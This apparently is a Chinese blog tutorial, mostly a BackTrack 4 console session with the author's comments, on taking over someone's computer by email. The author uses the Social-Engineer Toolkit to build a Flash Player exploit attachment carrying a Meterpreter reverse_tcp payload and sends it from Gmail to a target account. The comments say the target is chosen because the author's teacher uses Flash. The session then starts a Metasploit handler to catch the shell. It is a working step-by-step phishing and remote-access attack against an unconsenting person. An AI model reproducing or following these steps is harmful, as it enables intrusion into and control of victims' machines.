BackTrack 邮件日掉对方机器反弹CmdShell

  • A+
所属分类:lcx 这个国外网站有视频演示过了的。


MY Computer IP:     //Backtrack 4

We Need:

    #1 gmail      
    #2 target mail ad

login as: root

[email protected]'s password:

BackTrack 4 R2 (CodeName Nemesis) Security Auditing

For more information visit:
Last login: Wed Dec 29 00:09:34 2010 from
[email protected]:~# clear  
[email protected]:~# cd /pentest/exploits/SET/         //转到SET工具目录啦
[email protected]:/pentest/exploits/SET# ./set          //运行这个工具

                 /   _____/_   _____/__    ___/
                _____    |    __)_   |    |
                /        |          |    |
                /_______  //_______  /  |____|
                        /         /

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Written by David Kennedy (ReL1K)          [---]
  [---]                 Version: 1.0                     [---]
  [---]             Codename: 'Devolution'               [---]
  [---]     Report bugs to: [email protected]    [---]
  [---]          Follow Me On Twitter: dave_rel1k        [---]
  [---]        Java Applet Written by: Thomas Werth      [---]
  [---]        Homepage:        [---]
  [---]     Framework:    [---]
  [---]      Over 1.4 million downloads and counting.    [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

    DerbyCon 2011 Sep30-Oct02 -

Select from the menu:   //菜单。我们要选择的1

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8   Update the Metasploit Framework
9.  Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 1   //输入选择1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1    //再次选择1

Select the file format exploit you want.
The default is the PDF embedded EXE.

        ********** PAYLOADS **********     //这里是漏洞模块。很重要哦。我知道我们老师用Flash Player所以我选择2.发送Flash Player漏洞文件过去

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)

Enter the number you want (press enter for default): 2    //就是选择上面那个东东的

1. Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

Enter the payload you want (press enter for default): 2    //这是是选择反弹回来的方式。第二个吧 我们要用metasploit的
Enter the port to connect back on (press enter for default): 4444    //反弹回来的端口 可以写其他的

Generating fileformat exploit...

Payload creation complete.
All payloads get sent to the src/program_junk/template.pdf directory

As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 2      //这里生存的漏洞文件默认叫做moo.pdf 我需要一个更酷的名字 所以就选择2
Enter the new filename: helloworld.pdf     //我想到的很酷的名字
Filename changed, moving on...

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:   //选择工作方式

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1  //单一发送啦。就选择1吧

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1  //在来一次1
Below is a list of available templates:

1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL...have to check this out...
5: Status Report
6: Baby Pics
7: Dan Brown's Angels & Demons

Enter the number you want to use: 1   //这里是说用以前的还是新的。我要新的就选择1

Enter who you want to send email to: 15699*****     //要日掉的目标账号啦

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1   //这里是选择你发信的邮箱
Enter your GMAIL email address: xi7o***     //输入我的邮箱
Enter your password for gmail (it will not be displayed back to you):    //输入我的邮箱密码  //这里密码是不可见的

Do you want to setup a listener yes or no: no   //是否监听。我现在不要,因为我要用metasploit来监听

//搞定上面的邮件就已经发送出去了。你可以先测试一下。下面退出这个set程序 你可以用ctrl+c

[email protected]:/pentest/exploits/SET# cd ..   返回上一层目录
[email protected]:/pentest/exploits# cd framework3/    //跑到metsploit 目录
[email protected]:/pentest/exploits/framework3# ls
HACKING        external  msfconsole  msfgui       msfpescan  plugins     tools
README         lib       msfd        msfmachscan  msfrpc
data           modules   msfelfscan  msfopcode    msfrpcd    scripts
documentation  msfcli    msfencode   msfpayload   msfupdate  test
[email protected]:/pentest/exploits/framework3# ./msfconsole    //启动神器哦


           (__)    )
              ||--|| *

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 639 exploits - 320 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11189 updated 27 days ago (2010.12.01)

msf > use exploit/multi/handler     //使用这个监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp    //还记得我们在前面选择的某个后门返回方式吧。这里是一样的呢
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options    //看看选择。我们需要填充那些呢?

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST   yes       The listen address
   LPORT     44444            yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set lhost     //好吧。我们的IP地址弄上

msf exploit(handler) > set LPORT 4444                  //前面set中设置的反弹端口不要弄错了哦

msf exploit(handler) > exploit                                //好吧 开始fuck



佚名 @ 2013-05-27 23:43:47

楼主成功了吗?back track上显示发送出去了,但是qq邮箱没有收到。。。。



文章来源于 邮件日掉对方机器反弹CmdShell


:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: